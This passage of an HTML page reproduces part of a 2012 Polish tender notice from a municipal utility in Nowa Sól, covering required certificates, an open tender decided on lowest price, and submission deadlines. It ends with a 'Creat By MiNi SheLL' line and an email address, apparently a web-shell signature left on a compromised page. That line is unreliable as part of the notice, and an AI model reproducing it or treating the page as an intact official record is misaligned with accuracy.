<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy są dopuszczalne na zasadach i w przypadkach określonych w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> mzgkns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Komunalnej Spółka z o.o. w Nowej Soli z siedzibą przy 
ul. Konstruktorów nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2012 godzina 13:00, miejsce: Miejski Zakład Gospodarki Komunalnej Spółka z o.o. w Nowej Soli z siedzibą przy 
ul. Konstruktorów nr 2 - sekretariat - pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com